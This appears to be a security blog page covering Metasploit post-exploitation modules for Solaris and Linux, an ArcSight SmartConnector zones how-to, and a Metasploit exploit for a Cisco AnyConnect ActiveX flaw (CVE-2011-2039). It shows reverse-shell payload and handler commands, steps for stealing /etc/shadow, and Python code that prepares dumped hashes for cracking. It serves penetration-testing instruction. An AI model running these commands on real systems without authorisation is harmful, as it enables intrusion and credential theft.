Metasploit Solaris Post Exploitation : Enumeration and Hash Dump

A new set of post exploitation scripts has been developed and integrated in the Metasploit framework repository. These scripts let you gather interesting information on a Solaris target. These Metasploit post exploitation scripts support all Solaris versions. For the moment they only work with a "shell" session, but the Metasploit team is working on a version that supports complete integration with meterpreter.

Solaris enum_packages post exploitation script

This module focuses on installed software. It executes "/usr/bin/pkginfo -l" and exports all results to the "$HOME/.msf3/loot/" folder.


Solaris enum_services post exploitation script

This module focuses on installed services. It executes "/usr/bin/svcs -a" and exports all results to the "$HOME/.msf3/loot/" folder.


Solaris hashdump post exploitation script

This module gathers the "/etc/passwd" and "/etc/shadow" files and exports them to the "$HOME/.msf3/loot/" folder.


Solaris checkvm post exploitation script

This module attempts to determine whether the targeted system is running inside a virtual environment and tells you which virtualization technology is used. It supports detection of Hyper-V, VMware, VirtualBox, Xen, and QEMU/KVM.


To test these scripts you only need to create an executable payload for Solaris and follow these steps.

First create the payload with msfpayload and upload it to the targeted Solaris host.

sudo msfpayload cmd/unix/reverse_perl LHOST=192.168.178.21 LPORT=4444 X > payload

Then in msfconsole, run the following commands.

use exploit/multi/handler
set PAYLOAD cmd/unix/reverse_perl
set LHOST 192.168.178.21
exploit -j

Then, on the targeted Solaris host, execute the payload script. Once the shell session is open, run the post modules against it (for example "run post/solaris/gather/hashdump" with SESSION set to the session id); the loot lands in "$HOME/.msf3/loot/".

ArcSight SmartConnector Custom Zones Mapping

Once you have installed and configured your syslog ArcSight SmartConnector to communicate with your free L750MB Logger, you can customize the "zones mapping" for all devices that communicate with the SmartConnector. In the CEF (Common Event Format) standard, the device zone is carried in the "deviceZoneURI" field and the SmartConnector zone in the "agentZoneURI" field.

A zone represents a part of your network with contiguous IP addresses, for example LAN, DMZ, VPN, WIFI. If you customize your devices' "zones mapping", you will be able to create, with your Logger, alerts, queries and reports for groups of devices that are in the same zone. This will save you time 🙂

An ArcSight SmartConnector zone is represented by :

  • A starting IP address (for example : 192.168.0.15)
  • An ending IP address (for example : 192.168.0.20)
  • A zone name (for example : /All Zones/Office Zones/Printers)

The zone will be represented by this uncommented line :

192.168.0.15,192.168.0.20,/All Zones/Office Zones/Printers

In order to customize your devices' "zones mapping", you only have to edit the "defaultzones.csv" file located in the "$ARCSIGHT_HOME/current/user/agent/acp/" directory.

Delete the following line from the file :

#ignore.this.file <- delete this line

Then add your zones mapping, save the file and restart the SmartConnector.
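To see what the connector does with that file, here is an added example (my own code, not ArcSight's) that parses a defaultzones.csv in the format above and maps a device address to its zone URI. The sample CSV is constructed; the "narrowest range wins" rule for nested ranges and the refusal to load a file that still contains "#ignore.this.file" are my assumptions, mirroring the behaviour described in this post, not a statement of how the SmartConnector resolves overlaps internally. The overlap check is the sanity test you want before restarting the connector, because two partially overlapping ranges make a device's deviceZoneURI ambiguous.

```python
"""Parse an ArcSight-style defaultzones.csv and resolve device IPs to zones.
Added example; the CSV content below is constructed, not from a real deployment."""
import ipaddress

DEFAULTZONES_CSV = """\
# comment lines are skipped; the real file also starts out with an
# '#ignore.this.file' marker that must be deleted (see the post above)
192.168.0.0,192.168.0.255,/All Zones/Office Zones/LAN
192.168.0.15,192.168.0.20,/All Zones/Office Zones/Printers
10.10.10.0,10.10.10.255,/All Zones/DMZ
"""


def parse_zones(text):
    """Return a list of (start_ip, end_ip, zone_uri) tuples.

    Validates each uncommented line: three fields, both addresses parse, same
    IP version, start <= end. Errors name the offending line number.
    """
    zones = []
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if line == "#ignore.this.file":
            # Assumption: treat the marker as fatal so the mistake is loud.
            raise ValueError("remove the '#ignore.this.file' line first")
        if not line or line.startswith("#"):
            continue
        parts = [p.strip() for p in line.split(",", 2)]
        if len(parts) != 3:
            raise ValueError(f"line {n}: expected start,end,zone")
        start = ipaddress.ip_address(parts[0])
        end = ipaddress.ip_address(parts[1])
        if start.version != end.version or start > end:
            raise ValueError(f"line {n}: bad range {parts[0]}-{parts[1]}")
        zones.append((start, end, parts[2]))
    return zones


def lookup(zones, ip):
    """Zone URI for ip, or None if no range contains it.

    With nested ranges (Printers inside LAN) the narrowest range wins; this is
    an assumption of this example, not documented connector behaviour.
    """
    addr = ipaddress.ip_address(ip)
    best = None
    for start, end, uri in zones:
        if start.version == addr.version and start <= addr <= end:
            size = int(end) - int(start)
            if best is None or size < best[0]:
                best = (size, uri)
    return best[1] if best else None


def partial_overlaps(zones):
    """Pairs of zone URIs whose ranges overlap without one containing the other.

    Nested ranges are fine (a more specific zone inside a broader one); partial
    overlaps are a configuration bug because the device's zone becomes ambiguous.
    """
    bad = []
    for i, (s1, e1, u1) in enumerate(zones):
        for s2, e2, u2 in zones[i + 1:]:
            if s1.version != s2.version:
                continue
            if s1 <= e2 and s2 <= e1:  # the two ranges intersect
                nested = (s1 <= s2 and e2 <= e1) or (s2 <= s1 and e1 <= e2)
                if not nested:
                    bad.append((u1, u2))
    return bad


if __name__ == "__main__":
    zones = parse_zones(DEFAULTZONES_CSV)
    for probe in ("192.168.0.17", "192.168.0.100", "10.10.10.7", "172.16.0.1"):
        print(probe, "->", lookup(zones, probe))
    print("partial overlaps:", partial_overlaps(zones))
```

Run it once against your real defaultzones.csv (read the file instead of the embedded string) before restarting the SmartConnector; an empty overlap list and the expected zone for a few known device addresses is the check worth doing.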

Metasploit Linux Post Exploitation : Enumeration and Hash Dump

A new set of post exploitation scripts has been developed and integrated in the Metasploit framework repository. These scripts let you gather interesting information on a Linux target.

These Metasploit post exploitation scripts normally support all Linux distributions. For the moment they only work with a "shell" session, but the Metasploit team is working on a version that supports complete integration with meterpreter.

Linux enum_linux post exploitation script

This script lets you gather the following data from the target:

  • Hostname of the target.
  • Current running system user.
  • Linux distribution and version.
  • Complete running kernel version.
  • Complete list of system users from "/etc/passwd".
  • Network configuration from the "/sbin/ifconfig -a" command.
  • Routing configuration from the "/sbin/route" command.
  • List of all mounted drives from the "/bin/mount -l" command.
  • Complete "iptables -L" command output. The "nat" and "mangle" tables are also gathered with the "iptables -L -t nat" and "iptables -L -t mangle" commands.
  • DNS configuration from "/etc/resolv.conf".
  • SSH server configuration from "/etc/ssh/sshd_config".
  • Static host entries from "/etc/hosts".
  • Complete content of the "/etc/passwd" file.
  • Possible SSH keys located in ".ssh" folders across the entire system.
  • Installed software. Execution of "rpm -qa" for Fedora, Red Hat, SuSE, Mandrake and Oracle. Execution of "ls /var/log/packages" for Slackware. Execution of "dpkg -l" for Ubuntu and Debian. Execution of "equery list" for Gentoo. Execution of "/usr/bin/pacman -Q" for Arch Linux.
  • Installed services. Execution of "chkconfig --list" for Fedora, Red Hat, SuSE, Mandrake and Oracle. Some logfu commands for Mandrake. Execution of "/usr/bin/service --status-all" for Ubuntu and Debian. Execution of "/bin/rc-status --all" for Gentoo.
  • Possible ".bash_history" files located in each user's home folder.
  • Also, the module will try to take a screenshot of display ":0.0" with the xwd command.

All this data is transferred to your Metasploit box for further analysis. All gathered information is saved into a "loot/date" folder inside your "$HOME/.msf3" folder.


Linux enum_packages post exploitation script

This module is a sub-module that focuses only on installed software. Execution of "rpm -qa" for Fedora, Red Hat, SuSE, Mandrake and Oracle. Execution of "ls /var/log/packages" for Slackware. Execution of "dpkg -l" for Ubuntu and Debian. Execution of "equery list" for Gentoo. Execution of "/usr/bin/pacman -Q" for Arch Linux.


Linux enum_services post exploitation script

This module is a sub-module that focuses only on installed services. Execution of "chkconfig --list" for Fedora, Red Hat, SuSE, Mandrake and Oracle. Some logfu commands for Mandrake. Execution of "/usr/bin/service --status-all" for Ubuntu and Debian. Execution of "/bin/rc-status --all" for Gentoo.


Linux hashdump post exploitation script

This module gathers the "/etc/passwd" and "/etc/shadow" files.

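The Solaris hashdump module earlier on this page and this Linux one both hand you raw passwd and shadow files; the work that follows is joining them and deciding which hashes to attack first. The following is an added example (my own code, not part of the Metasploit modules or of this post) that builds the classic "unshadow" lines John the Ripper consumes and triages each account. All records in the two embedded files are constructed and the hashes are fake; the Solaris "$md5$" prefix and "*LK*"/"NP" markers and the Linux "$1$", "$5$", "$6$", "!"/"*" conventions are the only platform specifics it relies on.

```python
"""Join /etc/passwd + /etc/shadow loot into unshadow lines and triage hashes.
Added example; every record below is constructed and the hash values are fake."""
import re

PASSWD = """\
root:x:0:0:Super-User:/root:/usr/bin/bash
daemon:x:1:1::/:
sshd:x:22:22:SSH Daemon:/var/empty:/usr/bin/false
alice:x:1001:10:Alice:/home/alice:/bin/bash
bob:x:1002:10:Bob:/home/bob:/bin/bash
legacy:x:1003:10:Old Account:/home/legacy:/bin/sh
backup:x:0:0:Backup Operator:/home/backup:/bin/bash
"""

SHADOW = """\
root:$6$SaltSalt$0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmn/.:15000::::::
daemon:NP:6445::::::
sshd:*LK*:6445::::::
alice:$md5$AbCdEfGh$$0123456789abcdefghijklmn:15000:7:90:7:::
bob:$1$SaltSalt$0123456789abcdefghijkl:15000::::::
legacy:abJnggxhB/yWI:15000::::::
backup::15000::::::
"""

# Hash prefix -> algorithm. Covers Solaris ($md5$, $5$, $6$, traditional crypt)
# and Linux ($1$, $5$, $6$, bcrypt) formats seen in shadow files.
PREFIXES = [
    ("$md5$", "Solaris md5crypt"),
    ("$6$", "sha512crypt"),
    ("$5$", "sha256crypt"),
    ("$1$", "md5crypt"),
    ("$2a$", "bcrypt"),
    ("$2y$", "bcrypt"),
]
DES_RE = re.compile(r"^[./0-9A-Za-z]{13}$")  # traditional 13-char DES crypt


def classify(hash_field):
    """Label one shadow password field."""
    if hash_field == "":
        return "empty"
    # Solaris marks accounts with *LK* (locked) and NP (no password/login);
    # Linux uses '!' or '*', and '!' prefixed in front of a hash means locked.
    if hash_field.startswith(("*", "!", "NP")):
        return "locked"
    for prefix, name in PREFIXES:
        if hash_field.startswith(prefix):
            return name
    if DES_RE.match(hash_field):
        return "traditional DES crypt"
    return "unknown"


def parse_db(text):
    """Map account name -> list of colon-separated fields; skips blank/comment lines."""
    db = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        db[fields[0]] = fields
    return db


def unshadow(passwd_text, shadow_text):
    """user:hash:uid:gid:gecos:home:shell lines, as the unshadow tool prints them."""
    passwd, shadow = parse_db(passwd_text), parse_db(shadow_text)
    lines = []
    for user, f in passwd.items():
        pw_hash = shadow[user][1] if user in shadow else f[1]
        lines.append(":".join([user, pw_hash] + f[2:]))
    return lines


def triage(passwd_text, shadow_text):
    """Per-account algorithm plus the flags a pentester reads first:
    extra UID 0 accounts, empty passwords, and cheap-to-crack hash types."""
    passwd, shadow = parse_db(passwd_text), parse_db(shadow_text)
    report = {}
    for user, f in passwd.items():
        algo = classify(shadow.get(user, ["", f[1]])[1])
        flags = []
        if f[2] == "0":
            flags.append("uid0")
        if algo == "empty":
            flags.append("no-password")
        if algo in ("traditional DES crypt", "md5crypt"):
            flags.append("weak-hash")
        report[user] = {"algo": algo, "flags": flags}
    return report


if __name__ == "__main__":
    for line in unshadow(PASSWD, SHADOW):
        print(line)
    print()
    for user, info in sorted(triage(PASSWD, SHADOW).items()):
        print(f"{user:10s} {info['algo']:22s} {' '.join(info['flags'])}")
```

Point it at the two loot files the module wrote instead of the embedded strings; the "uid0" and "no-password" flags are what you report the same day, while "weak-hash" tells you which lines to feed to the cracker first.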

Linux enum_cron post exploitation script

This module will enumerate cron jobs for all users on the system by executing the command “crontab -u #{user} -l” where “#{user}” is the user enumerated from “/etc/passwd” file.


Linux checkvm post exploitation script

This module attempts to determine whether the targeted system is running inside a virtual environment and tells you which virtualization technology is used. It supports detection of Hyper-V, VMware, VirtualBox, Xen, and QEMU/KVM. All information is gathered by looking for virtualization indicators in the output of the "/sbin/lsmod", "dmesg" and "cat /proc/scsi/scsi" commands.

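The checkvm modules (the Solaris one above and this Linux one) work by string matching on command output, which is easy to reproduce offline. Below is an added example of that technique, my own code rather than the modules' logic: it runs a signature table over the three outputs the Linux module inspects and reports which hypervisor each source points to. The signature strings are my choices (driver names such as vmw_*, vboxguest, hv_vmbus, xen_*, virtio, and the vendor strings those products put in DMI and SCSI inquiry data), and the three sample outputs are constructed. Note the deliberate choice of "kvm-clock" rather than "kvm": the kvm and kvm_intel modules are loaded on a physical KVM host too, so they are not evidence of being a guest.

```python
"""Fingerprint the hypervisor from lsmod, dmesg and /proc/scsi/scsi output.
Added example; signatures are the author's own and sample outputs are constructed."""
import re

# (case-insensitive regex, product). Matched against the lowercased output.
SIGNATURES = [
    (r"vmw_|vmxnet|vmware", "VMware"),
    (r"vboxguest|vboxsf|vboxvideo|virtualbox|innotek|\bvbox\b", "VirtualBox"),
    (r"hv_vmbus|hv_storvsc|hv_netvsc|hyper-v|\bmsft\b", "Hyper-V"),
    # \bxen catches xen_blkfront / xen_netfront in lsmod and "Xen version" in dmesg
    (r"\bxen", "Xen"),
    # kvm-clock, not kvm: the kvm/kvm_intel modules are loaded on a physical host
    (r"virtio|qemu|kvm-clock", "QEMU/KVM"),
]

SOURCES = ("lsmod", "dmesg", "scsi")


def detect(lsmod_out, dmesg_out, scsi_out):
    """Return {product: [sources that matched]} for every signature that fires."""
    hits = {}
    for source, text in zip(SOURCES, (lsmod_out, dmesg_out, scsi_out)):
        low = text.lower()
        for pattern, product in SIGNATURES:
            if re.search(pattern, low):
                hits.setdefault(product, []).append(source)
    return hits


def best_guess(hits):
    """Product with the most corroborating sources, or None (physical/unknown)."""
    if not hits:
        return None
    return max(hits, key=lambda product: len(hits[product]))


# Constructed sample outputs, in the shape the real commands produce.
VMWARE_LSMOD = """\
Module                  Size  Used by
vmw_balloon            20480  0
vmxnet3                61440  0
vmw_pvscsi             28672  2
"""
VMWARE_DMESG = """\
[    0.000000] DMI: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 07/02/2015
[    1.234567] scsi 2:0:0:0: Direct-Access     VMware   Virtual disk     1.0  PQ: 0 ANSI: 2
"""
VMWARE_SCSI = """\
Attached devices:
Host: scsi2 Channel: 00 Id: 00 Lun: 00
  Vendor: VMware   Model: Virtual disk     Rev: 1.0
  Type:   Direct-Access                    ANSI  SCSI revision: 02
"""
PHYSICAL_LSMOD = """\
Module                  Size  Used by
e1000e                200704  0
ahci                   40960  3
"""
HYPERV_LSMOD = """\
Module                  Size  Used by
hv_netvsc              45056  0
hv_vmbus               90112  3 hv_netvsc
"""


if __name__ == "__main__":
    for name, args in (("vmware", (VMWARE_LSMOD, VMWARE_DMESG, VMWARE_SCSI)),
                       ("physical", (PHYSICAL_LSMOD, "", "")),
                       ("hyperv", (HYPERV_LSMOD, "", ""))):
        hits = detect(*args)
        print(f"{name:9s} -> {best_guess(hits)} {hits}")
```

Feeding it the three files the module stored in the loot directory reproduces the verdict; the per-source breakdown is the useful part when only one source matches, since a single dmesg hit on a vendor string is weaker evidence than a loaded paravirtual driver.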

To test these scripts you only need to create an executable payload for Linux and follow these steps.

First create the payload with msfpayload and upload it to the targeted Linux host.

sudo msfpayload linux/x86/shell_reverse_tcp LHOST=192.168.178.21 LPORT=4444 X > test

Then in msfconsole, run the following commands.

use exploit/multi/handler
set PAYLOAD linux/x86/shell_reverse_tcp
set LHOST 192.168.178.21
exploit -j

Then, on the targeted Linux host, execute the test payload. Once the shell session is open, run the post modules against it (for example "run post/linux/gather/enum_linux" with SESSION set to the session id).

CVE-2011-2039 : Cisco AnyConnect VPN Client ActiveX URL Property Download and Execute

Timeline :

Vulnerability discovered by Elazar Broad and submitted to iDefense Labs
Initial vulnerability notification to Cisco on 2009-02-24
Public release of the Cisco Security Advisory on 2011-06-01
Metasploit PoC provided by bannedit on 2011-06-06

PoC provided by :

bannedit

Reference(s) :

CVE-2011-2039
OSVDB-72714
CISCO-SA-20110601-AC
iDefense Labs

Affected version(s) :

For Windows all versions prior to 2.3.185
For Linux, Apple Mac OS X all versions in major releases other than 2.5.x and 3.0.x
2.5.x releases prior to 2.5.3041
3.0.x releases prior to 3.0.629
Microsoft Windows Mobile versions are affected, but no updates are planned.

Tested on Windows XP SP3 with :

Cisco AnyConnect VPN Client 2.0.0343

Description :

This module exploits a vulnerability in the Cisco AnyConnect VPN client vpnweb.ocx ActiveX control. This control is typically used to install the VPN client. An attacker can set the 'url' property, which is where the control looks for the files needed to install the client. The control downloads two files from the site specified in the 'url' property; one of them is stored in a temporary directory and executed.

Commands :

use exploit/windows/browser/cisco_anyconnect_exec
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig